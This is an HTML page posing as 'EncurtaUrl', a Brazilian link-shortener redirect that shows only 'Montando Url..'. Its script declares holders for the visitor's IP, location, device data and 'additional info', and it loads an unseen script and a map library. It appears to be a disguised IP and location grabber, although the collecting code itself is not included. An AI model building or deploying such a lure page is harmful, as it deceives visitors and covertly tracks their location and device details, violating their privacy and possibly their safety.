<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>EncurtaUrl || Redirecionador</title>
	<link rel="icon" href="icone.png" type="image/png">
	<meta property="og:title" content="EncurtaUrl || Melhor encurtador de LINK(s) do Brasil!">
    <meta property="og:description" content="Confira o link encurtado, abaixo!">
    <meta property="og:image" content="icone.png">
    <meta property="og:url" content="https://www.youtube.com/@EpeneShit">
    <meta property="og:type" content="website">
    <script>let userIP, locationDads = {}, deviceData = {}, additionalInfo = {};</script>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 20px;
            background-color: #f4f4f4;
        }
        h1 {
            color: #333;
        }
        .status {
            margin-top: 20px;
            font-weight: bold;
        }
        .error {
            color: red;
        }
        .info {
            color: green;
        }
        #map {
            height: 400px;
            width: 100%;
            margin-top: 20px;
        }
        .info-container {
            background: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 2px 5px rgba(0,0,0,0.1);
        }
        .info-container p {
            margin: 10px 0;
        }
        .info-container .label {
            font-weight: bold;
        }
    </style>
</head>
<body>
    <h1>Montando Url..</h1>
    <script src="js/cabesa.js"></script>
    <script src="https://unpkg.com/leaflet@1.7.1/dist/leaflet.js"></script>
</body>
</html>
